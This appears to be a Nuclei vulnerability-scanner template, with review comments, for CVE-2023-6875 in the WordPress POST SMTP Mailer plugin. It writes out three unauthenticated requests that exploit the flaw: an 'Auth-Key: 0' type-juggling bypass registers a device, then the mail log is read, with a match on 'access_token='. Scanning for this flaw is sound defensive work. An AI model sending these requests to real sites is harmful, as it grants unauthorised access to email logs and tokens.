nuclei-templates/http/cves/2023/CVE-2023-6875.yaml

# Nuclei HTTP template for CVE-2023-6875 (WordPress POST SMTP Mailer plugin).
# The id matches the CVE identifier recorded under classification.cve-id.
id: CVE-2023-6875
# Descriptive metadata only; the requests and matchers live in the http section.
info:
  name: WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  # Literal block scalar: the text is kept as one line plus a trailing newline.
  description: |
    The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.
  # Defender action: a positive result means the plugin is at or below 2.8.7
  # and should be upgraded to the fixed release named here.
  remediation: Fixed in 2.8.8
  reference:
    - https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60
    - https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6875
    - https://github.com/UlyssesSaicha/CVE-2023-6875
  classification:
    # The vector scores an unauthenticated network attack (AV:N, PR:N, UI:N)
    # with high impact on confidentiality, integrity and availability.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6875
    # CWE-862 is Missing Authorization; the description above attributes the
    # root cause to type juggling on the connect-app endpoint.
    cwe-id: CWE-862
    # NOTE(review): EPSS figures change over time; presumably these are the
    # values at the time the template was written - refresh before relying on them.
    epss-score: 0.04263
    epss-percentile: 0.92089
    cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # Agrees with the three raw requests defined in the http section.
    max-request: 3
    vendor: wpexperts
    product: post_smtp_mailer
    framework: wordpress
    # Search string for locating sites that reference the plugin's asset path.
    publicwww-query: "/wp-content/plugins/post-smtp"
  # NOTE(review): the http section POSTs to connect-app and only matches when
  # the supplied fcm_token is echoed back with success true, so a positive
  # result presumably leaves a scanner-chosen device registration on the
  # target. Consider adding the `intrusive` tag so the check can be excluded
  # from production scans - confirm against the project's tagging policy.
  tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass
# Per-run values substituted into the Device and Fcm-Token request headers.
# fcm_token is also looked for in the second response body by the matcher,
# which ties a positive result to this scan's own request rather than to
# pre-existing data on the target.
variables:
  # Quoted so YAML does not read the leading "{" as a flow mapping.
  fcm_token: "{{randstr_1}}"
  device: "{{randstr_2}}"
# Three unauthenticated requests against the plugin's REST routes, followed by
# a DSL matcher over the second and third response bodies.
# Detection hint for defenders: requests to /wp-json/post-smtp/v1/connect-app
# and /wp-json/post-smtp/v1/get-log from clients with no WordPress session are
# worth reviewing in web server logs on sites running version 2.8.7 or earlier.
http:
  - raw:
      # Request 1: POST to connect-app with Auth-Key: 0 and the random
      # Device / Fcm-Token values. Its response is not inspected by the matcher.
      # NOTE(review): presumably Auth-Key: 0 is the value the type-juggling
      # comparison named in the description accepts - confirm against the
      # referenced rest-api.php.
      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded
      # Request 2: byte-identical to request 1; its body (body_2) is checked.
      # NOTE(review): why the call is sent twice is not visible here;
      # presumably the first call primes server-side state - confirm before
      # removing either request.
      - |
        POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
        Content-Type: application/x-www-form-urlencoded
      # Request 3: GET get-log with the same headers; its body (body_3) is
      # checked. NOTE(review): a matching response presumably carries mail-log
      # content from the target, so treat stored scan responses as sensitive.
      - |
        GET /wp-json/post-smtp/v1/get-log HTTP/1.1
        Host: {{Hostname}}
        Auth-Key: 0
        Device: {{device}}
        Fcm-Token: {{fcm_token}}
    matchers:
      # Both expressions must hold (condition: and). Only response bodies are
      # examined; no status code is checked.
      - type: dsl
        dsl:
          # Single-quoted YAML leaves the backslashes untouched, so the escaped
          # double quotes are passed to the DSL expression as written.
          # body_2 must report success and echo this run's fcm_token.
          - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")'
          # body_3 must contain a true flag followed by a data field, and the
          # substring access_token=.
          - 'contains_all(body_3, "true,\"data\":", "access_token=")'
        condition: and
# NOTE(review): the digest line below presumably signs the template text as
# published; any edit to this file (comments included) would then need the
# template to be re-signed - confirm with the project's signing tooling.
# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950